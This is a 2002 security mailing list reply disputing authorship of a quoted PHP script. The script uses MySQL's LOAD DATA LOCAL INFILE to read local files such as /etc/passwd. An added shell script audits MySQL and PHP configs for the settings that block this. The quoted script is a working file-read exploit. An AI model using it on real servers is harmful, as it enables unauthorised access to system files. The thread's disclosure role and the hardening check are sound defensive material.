Re: File reading vulnerable in PHP and MySQL (Local Exploit)

From: Dave Wilson (dw@botanicus.net)
Date: 11/27/02

    Date: Wed, 27 Nov 2002 09:54:58 +0000
    From: Dave Wilson <dw@botanicus.net>
    To: Hai Nam Luke <hainamluke@hotmail.com>

    Hi there,

    Please see http://botanicus.net/dw/sec.html - I wrote about this in
    February. Prior to that, other people have claimed to have come across
    this too.

    On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:

    > Attacker can use PHP and mySQL to read some local file following this way:
    >
    > # Create a database (mySQL) and upload this file to your server
    > PHP Code: viewfile.php (programmed by Luke)
    >
    > ======================================================
    > <?
    > // config this data
    > $dbhost = "";
    > $dbuser = "";
    > $dbpasswd = "";
    > $dbname = "";
    > $file = "/etc/passwd"; // filename that you wanna view
    >
    > // shell code
    > echo "<pre>";
    >
    > mysql_connect ($dbhost, $dbuser, $dbpasswd);
    > $sql = array (
    >     "USE $dbname",
    >
    >     'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time()) . ' (a LONGBLOB)',
    >
    >     "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
    >     . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
    >     . "ESCAPED BY '' "
    >     . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    >
    >     "SELECT a FROM $tbl LIMIT 1"
    > );

    Umm, this is my code. Please check any good Bugtraq archive for proof of
    this fact. This is pretty much identical, except my English is better
    :-).

    > Luke (HVA)
    > http://www.hackervn.net

    Dave Wilson.
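An added configuration audit, not part of this thread or either poster's code: the quoted script only works where LOAD DATA LOCAL INFILE is allowed on both ends of the connection, so this script checks a my.cnf and a php.ini for the switches that close it. It assumes the server-side switch is MySQL's `local_infile` option under `[mysqld]` and the client-side switches are PHP's `mysql.allow_local_infile` / `mysqli.allow_local_infile` ini directives; the sample config files are constructed.

```shell
#!/bin/sh
# Added example, not from the original thread: audit the switches that close
# the LOAD DATA LOCAL INFILE read path shown above. Assumes the server-side
# switch is MySQL's local_infile option in [mysqld] and the client-side ones
# are PHP's mysql.allow_local_infile / mysqli.allow_local_infile directives.

# Exit 0 when my.cnf disables local_infile under [mysqld]. A bare
# "local-infile" line means ON; a missing line is reported as enabled, since
# the server default at the time of the thread was ON.
mysql_local_infile_disabled() {
    awk '
        /^[ \t]*\[/ { in_mysqld = ($0 ~ /^[ \t]*\[mysqld\]/) }
        in_mysqld && /^[ \t]*skip[-_]local[-_]infile/ { disabled = 1 }
        in_mysqld && /^[ \t]*(loose[-_])?local[-_]infile/ {
            v = $0
            sub(/^[^=]*=?[ \t]*/, "", v); sub(/[ \t#].*$/, "", v); v = tolower(v)
            disabled = (v == "0" || v == "off" || v == "false")
        }
        END { exit (disabled ? 0 : 1) }
    ' "$1"
}

# Exit 0 when php.ini turns off client-side LOCAL INFILE for both the mysql
# and mysqli extensions; a commented-out (;) or missing directive fails.
php_local_infile_disabled() {
    for directive in mysql.allow_local_infile mysqli.allow_local_infile; do
        awk -v d="$directive" '
            { line = $0; sub(/^[ \t]+/, "", line) }
            substr(line, 1, length(d)) == d && substr(line, length(d) + 1) ~ /^[ \t]*=/ {
                v = substr(line, length(d) + 1)
                sub(/^[ \t]*=[ \t]*/, "", v); sub(/[ \t;].*$/, "", v); v = tolower(v)
                ok = (v == "0" || v == "off" || v == "false" || v == "")
            }
            END { exit (ok ? 0 : 1) }
        ' "$1" || return 1
    done
}

# Constructed sample configs so the script runs stand-alone.
tmp=$(mktemp -d)
printf '[client]\nlocal-infile=1\n[mysqld]\nlocal-infile=0\n' > "$tmp/hardened.cnf"
printf '[mysqld]\nlocal-infile\n' > "$tmp/open.cnf"
printf 'mysql.allow_local_infile = Off\nmysqli.allow_local_infile=0\n' > "$tmp/php.ini"
for f in hardened.cnf open.cnf; do
    if mysql_local_infile_disabled "$tmp/$f"; then echo "$f: local_infile disabled"
    else echo "$f: local_infile ENABLED, LOAD DATA LOCAL will work"; fi
done
if php_local_infile_disabled "$tmp/php.ini"; then echo "php.ini: client LOCAL INFILE off"; fi
rm -rf "$tmp"
```

The server-side setting is the decisive one: with `local_infile` off in `[mysqld]`, the server refuses LOAD DATA LOCAL regardless of what the PHP client library allows.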